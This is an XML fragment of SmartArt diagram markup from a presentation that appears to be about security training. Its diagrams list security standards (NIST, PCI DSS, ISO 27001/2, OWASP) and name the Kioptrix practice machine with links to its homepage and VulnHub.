      <dgm:prSet presAssocID="{60FF9783-A18A-4B73-A43F-71A9755707E0}" presName="sp" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{1A085F16-540E-446B-8334-E1CDA75AF85D}" type="pres">
      <dgm:prSet presAssocID="{7DECE1FA-4B06-4D44-A313-EDA2E14EB22C}" presName="linNode" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{6C8FFAF7-3537-404C-B6DE-DF29EFB9314A}" type="pres">
      <dgm:prSet presAssocID="{7DECE1FA-4B06-4D44-A313-EDA2E14EB22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6B390-55C6-4A62-8A3A-9D68E61DA0EB}" type="pres">
      <dgm:prSet presAssocID="{7DECE1FA-4B06-4D44-A313-EDA2E14EB22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55F33C-BD2A-42CC-8AF7-C5A135B106F5}" srcId="{107AB32F-0828-470C-B90A-4ABF24E54769}" destId="{711B2AD0-F324-400C-AD25-BCE43F971AA1}" srcOrd="0" destOrd="0" parTransId="{171CB726-BA46-4540-A631-B31D120B49C8}" sibTransId="{57CE444D-B1E9-485D-AA90-E8BF7162F176}"/>
    <dgm:cxn modelId="{3D092AB8-5409-42E6-B6A1-B9FFDD2D4820}" srcId="{EB2E5388-BAAA-4012-BA1D-E5BFD6399588}" destId="{C79AE795-9F89-4A52-80FC-1FA40C6BCE7E}" srcOrd="0" destOrd="0" parTransId="{59C24103-AD78-4823-80D9-7D5187EB955A}" sibTransId="{0E842B29-BC90-4BCF-91A0-AAAC5FF26ACD}"/>
    <dgm:cxn modelId="{05D74322-1CED-4B7E-A146-71CB4D15DE48}" srcId="{CA0D78F2-8689-4664-91DC-96DDF362CF68}" destId="{83B3078A-4F7D-4B04-BE8E-D96327989A81}" srcOrd="0" destOrd="0" parTransId="{85197FEE-954D-4F0C-9678-A89ADBB12230}" sibTransId="{C80CECBE-329A-483D-A046-5E86ABF4C5E9}"/>
    <dgm:cxn modelId="{CF36CF9B-24D3-443A-8F2D-38C54B781C9A}" type="presOf" srcId="{C79AE795-9F89-4A52-80FC-1FA40C6BCE7E}" destId="{0CA4CECC-1F65-4099-A139-F4D80312019E}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{CBD488B7-B47F-4BF2-ACC7-68C7EFA8B323}" srcId="{7DECE1FA-4B06-4D44-A313-EDA2E14EB22C}" destId="{CA0D78F2-8689-4664-91DC-96DDF362CF68}" srcOrd="0" destOrd="0" parTransId="{84A7E56C-BA39-4149-9C91-8E0BA0F48E80}" sibTransId="{8A8E8BA1-0CDD-445E-B730-1F32BAA33B60}"/>
    <dgm:cxn modelId="{6402D3EA-6FA5-4046-BC7F-0266008407EA}" srcId="{3173193B-6909-48AD-8DB1-4A2285ABEA4D}" destId="{7DECE1FA-4B06-4D44-A313-EDA2E14EB22C}" srcOrd="3" destOrd="0" parTransId="{6BA9D465-8223-479E-9313-73DE9D4299F8}" sibTransId="{2D25B5B9-073E-4A81-B05A-BD93DD5E6446}"/>
    <dgm:cxn modelId="{EF52732A-F583-4BAC-82EA-2038AD290F87}" srcId="{3173193B-6909-48AD-8DB1-4A2285ABEA4D}" destId="{107AB32F-0828-470C-B90A-4ABF24E54769}" srcOrd="1" destOrd="0" parTransId="{C93E4765-B212-4E72-90F9-FE4E745EF456}" sibTransId="{D6A61F3D-B1AE-427A-8938-5C91B15DD5DD}"/>
    <dgm:cxn modelId="{C1E0C21A-2D57-4C66-8F18-8F2F2E57B477}" type="presOf" srcId="{67861048-E688-48B3-8341-37BA10358FA4}" destId="{7E6D2615-16C0-44A5-9610-1724B74537AF}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{809563D0-82CF-42B1-9E8A-F0C9217812C8}" type="presOf" srcId="{7DECE1FA-4B06-4D44-A313-EDA2E14EB22C}" destId="{6C8FFAF7-3537-404C-B6DE-DF29EFB9314A}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{617537D4-EF2F-4440-8650-248E0F6CBBA3}" srcId="{3173193B-6909-48AD-8DB1-4A2285ABEA4D}" destId="{67861048-E688-48B3-8341-37BA10358FA4}" srcOrd="2" destOrd="0" parTransId="{2AD35236-676B-490D-A4D8-B40BA42C3D06}" sibTransId="{60FF9783-A18A-4B73-A43F-71A9755707E0}"/>
    <dgm:cxn modelId="{E901712E-2E3F-48C8-B199-832E1D2CBAD3}" type="presOf" srcId="{3173193B-6909-48AD-8DB1-4A2285ABEA4D}" destId="{615E33B8-3DB5-4928-BFB1-788122F12516}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{A815AEC0-9F66-4064-ACCC-606D1A3A5DC9}" type="presOf" srcId="{83B3078A-4F7D-4B04-BE8E-D96327989A81}" destId="{B656B390-55C6-4A62-8A3A-9D68E61DA0EB}" srcOrd="0" destOrd="1" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{07E449C3-3468-49F2-AEB7-13DD440A83D5}" type="presOf" srcId="{93DC16D8-955A-43F5-BA7C-94A6614705AF}" destId="{7AA874FD-D801-4D9B-8070-2165592A4B5B}" srcOrd="0" destOrd="1" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{36867E61-EA9F-4687-BB83-BD587C1E0E41}" srcId="{711B2AD0-F324-400C-AD25-BCE43F971AA1}" destId="{93DC16D8-955A-43F5-BA7C-94A6614705AF}" srcOrd="0" destOrd="0" parTransId="{64BB2207-933D-49A0-B8A0-279697B6F68C}" sibTransId="{FF68A067-024E-4D86-99BF-C8A814331B5B}"/>
    <dgm:cxn modelId="{A7549D60-4E89-44FD-BD28-C32180C2EF13}" type="presOf" srcId="{711B2AD0-F324-400C-AD25-BCE43F971AA1}" destId="{7AA874FD-D801-4D9B-8070-2165592A4B5B}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{23F5E549-92AD-409B-A014-820127862DB7}" type="presOf" srcId="{42DC93E3-1FF3-4903-989B-96464CCEECAE}" destId="{2AAD4EF0-97AA-4B9E-AAE5-2D0BA239EF6A}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{9407DB5D-BDBF-4A51-9E49-B95828A31887}" type="presOf" srcId="{EB2E5388-BAAA-4012-BA1D-E5BFD6399588}" destId="{D6EA24D2-D007-4DA2-B2E9-89642914AEB0}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{CCDA7D8A-7B53-46F4-B552-5AB85AC4E577}" type="presOf" srcId="{CA0D78F2-8689-4664-91DC-96DDF362CF68}" destId="{B656B390-55C6-4A62-8A3A-9D68E61DA0EB}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{80BF364E-4932-418D-8569-43742C207EEC}" type="presOf" srcId="{C7B9970A-22FF-4F5D-8CA9-AA1745EC2EFD}" destId="{2AAD4EF0-97AA-4B9E-AAE5-2D0BA239EF6A}" srcOrd="0" destOrd="1" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{D6F0AC8C-47F4-434A-90FB-9832637D1F06}" srcId="{C79AE795-9F89-4A52-80FC-1FA40C6BCE7E}" destId="{98AA85D1-6961-4DF9-A955-23B6345C34D8}" srcOrd="0" destOrd="0" parTransId="{1BC56EF2-C32B-4924-A4B3-72E6DEC30C8B}" sibTransId="{F14F6494-101D-420A-A543-0F3F282295FF}"/>
    <dgm:cxn modelId="{788E8356-ACD1-4DCE-83BA-A4EB9EFF516E}" srcId="{67861048-E688-48B3-8341-37BA10358FA4}" destId="{42DC93E3-1FF3-4903-989B-96464CCEECAE}" srcOrd="0" destOrd="0" parTransId="{9670F6A1-C18E-4CAA-AC5E-F0BB5A0F4440}" sibTransId="{A86A7B78-5FA4-4299-8D49-57AF405970AA}"/>
    <dgm:cxn modelId="{32CFF1DD-1A59-4D9D-9A21-25CFCE8ACC3A}" type="presOf" srcId="{107AB32F-0828-470C-B90A-4ABF24E54769}" destId="{58192DC6-BB82-4314-A3B9-4FECBD126BB1}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{63B452EC-64D8-4CDB-AECB-2FAF5554E3EA}" srcId="{42DC93E3-1FF3-4903-989B-96464CCEECAE}" destId="{C7B9970A-22FF-4F5D-8CA9-AA1745EC2EFD}" srcOrd="0" destOrd="0" parTransId="{2E02F314-8295-41F5-B005-F9935F052171}" sibTransId="{E93B09EA-35EF-410A-9224-2B08A7688BD4}"/>
    <dgm:cxn modelId="{0990BBB7-C92A-4A67-8E42-1B88F9D3EAE6}" type="presOf" srcId="{98AA85D1-6961-4DF9-A955-23B6345C34D8}" destId="{0CA4CECC-1F65-4099-A139-F4D80312019E}" srcOrd="0" destOrd="1" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{32023ABA-F020-46C0-B5BB-3E65320CBD96}" srcId="{3173193B-6909-48AD-8DB1-4A2285ABEA4D}" destId="{EB2E5388-BAAA-4012-BA1D-E5BFD6399588}" srcOrd="0" destOrd="0" parTransId="{A1CA12E1-CA72-4F03-8324-865B6C5EB2A5}" sibTransId="{5A4ED7D7-90D5-4084-8FD1-E9FA7C023A3A}"/>
    <dgm:cxn modelId="{AAE901C1-6B8F-48C0-A1D4-CB34FB86AD61}" type="presParOf" srcId="{615E33B8-3DB5-4928-BFB1-788122F12516}" destId="{97DEFD85-5186-4F1F-A6F0-91ACC6B9B49F}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{0161534A-7CEF-4377-9B36-5E983CCE42E8}" type="presParOf" srcId="{97DEFD85-5186-4F1F-A6F0-91ACC6B9B49F}" destId="{D6EA24D2-D007-4DA2-B2E9-89642914AEB0}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{EF20EFDA-6B21-4966-B693-A4B715513250}" type="presParOf" srcId="{97DEFD85-5186-4F1F-A6F0-91ACC6B9B49F}" destId="{0CA4CECC-1F65-4099-A139-F4D80312019E}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{FDA87ACB-7AA8-4F98-A515-C728C7402F71}" type="presParOf" srcId="{615E33B8-3DB5-4928-BFB1-788122F12516}" destId="{7E779018-FAF9-4701-AC22-05A56FA03478}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{BA8419BF-3959-4C30-AF72-092E76E50247}" type="presParOf" srcId="{615E33B8-3DB5-4928-BFB1-788122F12516}" destId="{34E22041-EAB0-4B87-AE7E-E09696A41040}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{361532E6-E737-43D1-9B33-19E30F3CE114}" type="presParOf" srcId="{34E22041-EAB0-4B87-AE7E-E09696A41040}" destId="{58192DC6-BB82-4314-A3B9-4FECBD126BB1}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{73AD826B-E196-496A-B6B0-11E2F4376358}" type="presParOf" srcId="{34E22041-EAB0-4B87-AE7E-E09696A41040}" destId="{7AA874FD-D801-4D9B-8070-2165592A4B5B}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{60301EE6-95F5-4B56-BACC-37EF00BD98CE}" type="presParOf" srcId="{615E33B8-3DB5-4928-BFB1-788122F12516}" destId="{36D2E88A-BB19-473A-979B-8B9F07F8D50F}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{B3EF434B-53B4-4E77-95BF-F4B3B6F69E2B}" type="presParOf" srcId="{615E33B8-3DB5-4928-BFB1-788122F12516}" destId="{F8CEEDAD-287E-4C84-A756-A95632B65C41}" srcOrd="4" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{0ECC9572-135D-4F32-BEF9-E273D86FD210}" type="presParOf" srcId="{F8CEEDAD-287E-4C84-A756-A95632B65C41}" destId="{7E6D2615-16C0-44A5-9610-1724B74537AF}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{883A08FB-6081-4EAE-8DBB-D855821EB986}" type="presParOf" srcId="{F8CEEDAD-287E-4C84-A756-A95632B65C41}" destId="{2AAD4EF0-97AA-4B9E-AAE5-2D0BA239EF6A}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{2A702385-EC4A-46D2-B9DE-345E34A1F60A}" type="presParOf" srcId="{615E33B8-3DB5-4928-BFB1-788122F12516}" destId="{9D0C5C1B-44EB-45B6-A36E-1B3B38E855CD}" srcOrd="5" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{5D235505-A7F4-4235-96B6-D957E8654D8F}" type="presParOf" srcId="{615E33B8-3DB5-4928-BFB1-788122F12516}" destId="{1A085F16-540E-446B-8334-E1CDA75AF85D}" srcOrd="6" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{BE937254-CEAE-4FCA-AF3E-E90B62596A63}" type="presParOf" srcId="{1A085F16-540E-446B-8334-E1CDA75AF85D}" destId="{6C8FFAF7-3537-404C-B6DE-DF29EFB9314A}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{EA03B21F-5CBB-447A-8798-19D2BC29EFBD}" type="presParOf" srcId="{1A085F16-540E-446B-8334-E1CDA75AF85D}" destId="{B656B390-55C6-4A62-8A3A-9D68E61DA0E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B1EA96-5786-4D55-8B61-66EEB4D01038}" type="doc">
      <dgm:prSet loTypeId="urn:microsoft.com/office/officeart/2005/8/layout/list1" loCatId="Inbox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8A9CC3-AF4D-4B75-9E82-EF31B7FACD6B}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US"/>
            <a:t>General/ Popular Security Standard Guidelines</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{00DD7897-5686-4E46-8A0F-AFE3A9BD4A7A}" type="parTrans" cxnId="{9F66AA6E-CBD4-4653-B743-E6E5D7F9AE72}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{A7D8C640-1524-4555-A23C-BD88BBF7F4F8}" type="sibTrans" cxnId="{9F66AA6E-CBD4-4653-B743-E6E5D7F9AE72}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{3999078E-8053-41A8-8A8E-0F51D95404DA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National Institute of Standards &amp; Technology</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{028E8615-E862-45FF-BC90-6A38E9F12A3A}" type="parTrans" cxnId="{F2E7F404-12D5-4954-B9AC-38ED572408C8}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{C78D158D-C7BD-4C7E-AAB4-6FE433CEAC7B}" type="sibTrans" cxnId="{F2E7F404-12D5-4954-B9AC-38ED572408C8}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{B9FB8BB4-7E1C-477C-8569-FD57D0A40344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(PCI) Payment Card Industry Data Security Standards</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{4EE1A44A-A9D3-4B54-81E6-04A93FD1F68A}" type="parTrans" cxnId="{1E014148-5300-430A-BA3D-A14799B9B5AD}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{9EECBB5D-B71C-451A-AD20-F647EF666CA1}" type="sibTrans" cxnId="{1E014148-5300-430A-BA3D-A14799B9B5AD}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{003E348E-3BA5-419B-97DF-057E0D61DF39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(ISO 27001/2) International Organization of Standardization</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{8B76A705-EEE0-43B4-9DBA-968C36283080}" type="parTrans" cxnId="{FFB30AA6-539F-4C5C-90A2-3E57324F88D0}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{A3BB9DD8-8CC1-4CB8-9B0B-22D6D6B3133F}" type="sibTrans" cxnId="{FFB30AA6-539F-4C5C-90A2-3E57324F88D0}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{5AEBCC16-472D-4DBA-A17B-A4011D7645D6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dirty="0">
              <a:hlinkClick xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="rId4"/>
            </a:rPr>
            <a:t>(OWASP) Open Web Application Security Project</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{BFAC4BEC-3431-4DB7-A272-D86FBCC2793C}" type="parTrans" cxnId="{B6520BB9-6999-4084-85E9-17612CF0A6AA}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{3548330B-0F69-48B6-82DC-B5D814E05130}" type="sibTrans" cxnId="{B6520BB9-6999-4084-85E9-17612CF0A6AA}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{21980F75-411A-45F2-9137-E020B797CA4F}" type="pres">
      <dgm:prSet presAssocID="{59B1EA96-5786-4D55-8B61-66EEB4D0103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0EB4E0-1B01-423F-B6F5-4268826D1DCF}" type="pres">
      <dgm:prSet presAssocID="{E78A9CC3-AF4D-4B75-9E82-EF31B7FACD6B}" presName="parentLin" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{19B9DB92-20AE-46E6-93C7-E4F77B009D84}" type="pres">
      <dgm:prSet presAssocID="{E78A9CC3-AF4D-4B75-9E82-EF31B7FACD6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FBEB8CC-EFEA-464A-9779-87B993F0AF58}" type="pres">
      <dgm:prSet presAssocID="{E78A9CC3-AF4D-4B75-9E82-EF31B7FACD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094F9-F325-4AF3-B9E2-076847C847C4}" type="pres">
      <dgm:prSet presAssocID="{E78A9CC3-AF4D-4B75-9E82-EF31B7FACD6B}" presName="negativeSpace" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{E9002C56-B7B9-42C0-BF34-9AC97ECEBBE3}" type="pres">
      <dgm:prSet presAssocID="{E78A9CC3-AF4D-4B75-9E82-EF31B7FACD6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982427-CDFC-4B81-A98A-5C170B9848A6}" type="presOf" srcId="{3999078E-8053-41A8-8A8E-0F51D95404DA}" destId="{E9002C56-B7B9-42C0-BF34-9AC97ECEBBE3}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{B211D6C6-60B2-45F4-81F7-197B2461FF1B}" type="presOf" srcId="{E78A9CC3-AF4D-4B75-9E82-EF31B7FACD6B}" destId="{8FBEB8CC-EFEA-464A-9779-87B993F0AF58}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{08096EFE-D270-415C-A17E-540AC8941FEE}" type="presOf" srcId="{B9FB8BB4-7E1C-477C-8569-FD57D0A40344}" destId="{E9002C56-B7B9-42C0-BF34-9AC97ECEBBE3}" srcOrd="0" destOrd="1" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{1E014148-5300-430A-BA3D-A14799B9B5AD}" srcId="{E78A9CC3-AF4D-4B75-9E82-EF31B7FACD6B}" destId="{B9FB8BB4-7E1C-477C-8569-FD57D0A40344}" srcOrd="1" destOrd="0" parTransId="{4EE1A44A-A9D3-4B54-81E6-04A93FD1F68A}" sibTransId="{9EECBB5D-B71C-451A-AD20-F647EF666CA1}"/>
    <dgm:cxn modelId="{F2E7F404-12D5-4954-B9AC-38ED572408C8}" srcId="{E78A9CC3-AF4D-4B75-9E82-EF31B7FACD6B}" destId="{3999078E-8053-41A8-8A8E-0F51D95404DA}" srcOrd="0" destOrd="0" parTransId="{028E8615-E862-45FF-BC90-6A38E9F12A3A}" sibTransId="{C78D158D-C7BD-4C7E-AAB4-6FE433CEAC7B}"/>
    <dgm:cxn modelId="{7E1838B8-3647-4BD0-95B9-527EA5A18F32}" type="presOf" srcId="{5AEBCC16-472D-4DBA-A17B-A4011D7645D6}" destId="{E9002C56-B7B9-42C0-BF34-9AC97ECEBBE3}" srcOrd="0" destOrd="3" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{DEA26697-D490-42EB-BFD6-48EA67484D51}" type="presOf" srcId="{E78A9CC3-AF4D-4B75-9E82-EF31B7FACD6B}" destId="{19B9DB92-20AE-46E6-93C7-E4F77B009D84}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{9F66AA6E-CBD4-4653-B743-E6E5D7F9AE72}" srcId="{59B1EA96-5786-4D55-8B61-66EEB4D01038}" destId="{E78A9CC3-AF4D-4B75-9E82-EF31B7FACD6B}" srcOrd="0" destOrd="0" parTransId="{00DD7897-5686-4E46-8A0F-AFE3A9BD4A7A}" sibTransId="{A7D8C640-1524-4555-A23C-BD88BBF7F4F8}"/>
    <dgm:cxn modelId="{B6520BB9-6999-4084-85E9-17612CF0A6AA}" srcId="{E78A9CC3-AF4D-4B75-9E82-EF31B7FACD6B}" destId="{5AEBCC16-472D-4DBA-A17B-A4011D7645D6}" srcOrd="3" destOrd="0" parTransId="{BFAC4BEC-3431-4DB7-A272-D86FBCC2793C}" sibTransId="{3548330B-0F69-48B6-82DC-B5D814E05130}"/>
    <dgm:cxn modelId="{FFB30AA6-539F-4C5C-90A2-3E57324F88D0}" srcId="{E78A9CC3-AF4D-4B75-9E82-EF31B7FACD6B}" destId="{003E348E-3BA5-419B-97DF-057E0D61DF39}" srcOrd="2" destOrd="0" parTransId="{8B76A705-EEE0-43B4-9DBA-968C36283080}" sibTransId="{A3BB9DD8-8CC1-4CB8-9B0B-22D6D6B3133F}"/>
    <dgm:cxn modelId="{F50F236D-A960-4E1E-AF11-70852B942868}" type="presOf" srcId="{59B1EA96-5786-4D55-8B61-66EEB4D01038}" destId="{21980F75-411A-45F2-9137-E020B797CA4F}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{1F9E8D6E-2B8E-4559-A183-98134AA5C9F7}" type="presOf" srcId="{003E348E-3BA5-419B-97DF-057E0D61DF39}" destId="{E9002C56-B7B9-42C0-BF34-9AC97ECEBBE3}" srcOrd="0" destOrd="2" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{381725EA-08ED-4DC7-B3A6-30CDB88C8B51}" type="presParOf" srcId="{21980F75-411A-45F2-9137-E020B797CA4F}" destId="{320EB4E0-1B01-423F-B6F5-4268826D1DCF}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{770FAD83-0C3B-4F9A-9433-F651434DF8EE}" type="presParOf" srcId="{320EB4E0-1B01-423F-B6F5-4268826D1DCF}" destId="{19B9DB92-20AE-46E6-93C7-E4F77B009D84}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{54DB3E60-8260-4347-A5FE-2D8AFFF81AEF}" type="presParOf" srcId="{320EB4E0-1B01-423F-B6F5-4268826D1DCF}" destId="{8FBEB8CC-EFEA-464A-9779-87B993F0AF58}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{7ACF0422-90E5-4106-8CC6-54952F1E3FA6}" type="presParOf" srcId="{21980F75-411A-45F2-9137-E020B797CA4F}" destId="{3D3094F9-F325-4AF3-B9E2-076847C847C4}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{E2488D33-54BD-48D1-9382-8E572C084234}" type="presParOf" srcId="{21980F75-411A-45F2-9137-E020B797CA4F}" destId="{E9002C56-B7B9-42C0-BF34-9AC97ECEBBE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4CECC-1F65-4099-A139-F4D80312019E}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm rot="5400000">
          <a:off x="4827416" y="-1852291"/>
          <a:ext cx="1071078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/>
            <a:t>Kioptrix</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="2800" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm rot="-5400000">
        <a:off x="2839211" y="188200"/>
        <a:ext cx="4995202" cy="966506"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{D6EA24D2-D007-4DA2-B2E9-89642914AEB0}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="2028"/>
          <a:ext cx="2839212" cy="1338848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Author/Series</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="65357" y="67385"/>
        <a:ext cx="2708498" cy="1208134"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{774AE799-EF59-43CE-B61C-F4F338685460}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm rot="5400000">
          <a:off x="4827416" y="-446499"/>
          <a:ext cx="1071078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>
              <a:hlinkClick xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="rId1"/>
            </a:rPr>
            <a:t>Kioptrix Homepage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>
              <a:hlinkClick xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="rId2"/>
            </a:rPr>
            <a:t>Vulnhub</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="2800" kern="1200" dirty="0">
              <a:hlinkClick xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="rId2"/>
            </a:rPr>
            <a:t> Location</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="2800" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm rot="-5400000">
        <a:off x="2839211" y="1593992"/>
        <a:ext cx="4995202" cy="966506"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{C26DF289-C46D-41DC-8707-F606F112E873}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="1407819"/>
